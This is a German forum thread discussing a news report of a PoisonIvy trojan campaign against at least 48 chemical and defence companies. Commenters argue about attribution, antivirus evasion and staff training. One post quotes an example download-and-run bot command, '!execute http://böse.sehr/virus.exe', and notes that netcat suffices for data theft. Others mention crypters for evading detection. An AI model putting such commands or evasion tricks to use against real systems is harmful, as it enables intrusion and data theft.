Cyber-Angriff auf mindestens 48 Chemie- und Rüstungsfirmen

[Annika_Kremer]

Mindestens 48 Chemie- und Rüstungsunternehmen wurden Ziel eines koordinierten Cyber-Angriffs. Dies berichtet das IT-Sicherheitsunternehmen Symantec. Der Firma zufolge gingen die Angriffe von China aus. Die als "PoisonIvy" bezeichnete Malware war auf das Abgreifen von sensiblen Informationen wie Design-Dokumenten, Formeln und Details des Herstellungsprozesses spezialisiert.

zur News

[Exterminans]

Ist das jetzt irgendeine selbst geschriebene Software mit dem Namen, oder wurde da wirklich nur der klassische Poisonivy Trojaner verwendet, der in sämtlichen Szeneforen nur als Anschauungsbeispiel verwendet wird wie man einen Trojaner mit dem Hex-Editor UD macht?

Wenn ja, dann sind die Unternehmen selber Schuld. Jede Antivirensoftware mit einer Heuristik erkennt das Teil, das Teil ist nicht einmal in der Lage eine Softwarefirewall zu umgehen und jedes vernünftige IDS-System mit Deep packet inspection schlägt da eigentlich sofort Alarm. Sprich, wenn es wirklich der Trojaner ist, von dem ich denke das er das ist, dann hat die IT der betroffenen Unternehmen einfach nur grob fahrlässig gehandelt.

[Rainbow132]

Ja ich war grad auch sehr Irritiert als ich das gelsesn habe. Zumal ich PoisonIvy noch irgendwo auf der Platte habe, und eigentlich nicht der Meinung war damit in Rüstungsunternehmen eindringen zu können^^
aber ich denke eher dass es sich um eine andere Software handelt. Schielßlich ist ja PI ein RAT , dass nicht selbstständig spezielle Dokumente sucht

[TalkToFrank]

Pf..wenn du Sub7 genug aufbaust, kannst du damit bestimmt auch noch was anfangen...ist eben einfach die Frage wieviel Zeit du investierst
(generell finde ich es extrem, dass dort keine Sicherung aktiv wurde, nachdem auf hunderten Rechnern die gleiche Mail eingegangen ist...)

[akademiker]

Steht doch im Paper, dass noch ne extra Software dabei war, die PI verschlüsselt hat gegen die Erkennung von Antivir. Eine Deep Packet Inspection Firewall wird nix verdächtigen, wenn Poison Ivy auf einem http/https Port verschlüsselt kommuniziert, sieht ja nicht anders aus als ein gewöhnlicher Browser. Sie schlägt höchstens aus, wenn ein Programm über Port 6667 und IRC den Befehl "!execute http://böse.sehr/virus.exe" kriegt.
Eigentlich reicht schon netcat um Daten aus einer Firma zu entwenden.

[Rammsteiner]

Die chinesische Regierung hat damit natürlich nix zu tun, wie sie immer wieder behaupten.

[P7BB]

Quatsch, die doch nicht Ich mein - die haben ja nur vor kurzem bekannt gegeben, dass sie eine Cyber-Army haben und rein zufällig war dieser Angriff nun auch sehr koordiniert. Also wer da auf diese Idee kommen könnte...

Ich find es sehr seltsam, dass sich Länder wie die USA sowas gefallen lassen und nicht schon längst diplomatische Konsequenzen daraus gezogen wurden. Aber was ich noch viel interessanter finde, ist, dass scheinbar viele Mitarbeiter sofort mal eben das "wichtige Update" selbstständig installiert haben, statt das der IT-Abteilung zu überlassen. Ich denke, Mitarbeiter von Unternehmen sollten besser geschult werden und lernen, was verdächtigt wirkt. Notfalls kann man ja immer noch die EDV fragen, ob es sich dabei um eine echte Mail handelt oder ob diese nur ein Fake ist.

[_YeHoWaH_]

PosionIvy ist frei verfügbar und jedes l33t 1337 Scr1p7k1ddY kann diesen Angriff mit gekauften E-mail Adressen (soweit ich weiß kann man die e-mail adressen in einschlägigen Foren kaufen ) kann diesen Angriff ausführen. Dieses Scriptkiddy brauch nur die Adressen kaufen und einen Crypter und Viola fertig. Warum wird immer gleich spekuliert ob die Regierung hintersteht. Die Regierung hätte garantiert auf keinen PUBLIC Trojaner zurückgegriffen sondern sich ihren eigenen programmieren lassen. -> Bundestrojaner *hust* . Also für mich war das eine Tat eines Einzeltäters der seinen l33t 1337 Freunden etwas beweisen wollte...

grüße

[Rammsteiner]

Also für mich war das eine Tat eines Einzeltäters der seinen l33t 1337 Freunden etwas beweisen wollte...

Die Attacken fanden zwischen Ende Juli und Mitte September statt. Der mutmaßliche Angreifer, ein junger Chinese, war laut Symantec wahrscheinlich auch an den Cyber-Angriffen auf mehrere Menschenrechts-Gruppen sowie auf die Automobil-Industrie im vergangenen Frühjahr beteiligt. Ob der Verdächtige, der basierend auf einer wörtlichen Übersetzung seines Namens ins Englische den Codenamen "Covert Grove" erhielt, allerdings der einzige Verantwortliche ist oder ob er womöglich auf die Anweisungen Dritter hin agiert, ist bislang unklar.

Klingt nicht nach gelangweiltem Kiddie.

[TalkToFrank]

Klingt nicht nach gelangweiltem Kiddie.

Stimme ich zu...eher nach ner Regierung die keinen Plan von sowas hat und nur irgendwie aufruhr machen will

[Gr0berUnfug]

Die Rechner wurden offenbar durch Verschicken infizierter E-Mails an Angestellte mit Malware präpariert. In den Mails wurde behauptet, dass diese von Geschäftspartnern stammten oder wichtige Sicherheitsupdates enthielten. Pro betroffenem Unternehmen sollen 100 bis 500 Angestellte derartige Mails erhalten haben.

Tada, und hier sehen wir wieder wodran es lag... Am nichtgeschultem Anwender. Ich gebe zu, es gibt ja mitlerweile echt gut getarnte Emails mit Anhängen. Aber spätestens wenn sich der Anhang nicht regulär öffnet bimmelt hier bei uns in der IT das Telefon. Und wir sind kein hochsicherheits Rüstungsunternehmen. Aber mitlerweile sollte jeder der in so einem Unternehmen arbeitet schon wissen welche Anhänge er anklicken darf und welche nicht. Dadrüber hinaus dürfte sowas allerdings auch gar nicht erst beim Anwender landen. Hier wurde sicherlich wiedermal in der IT gespart, also alle selber Schuld!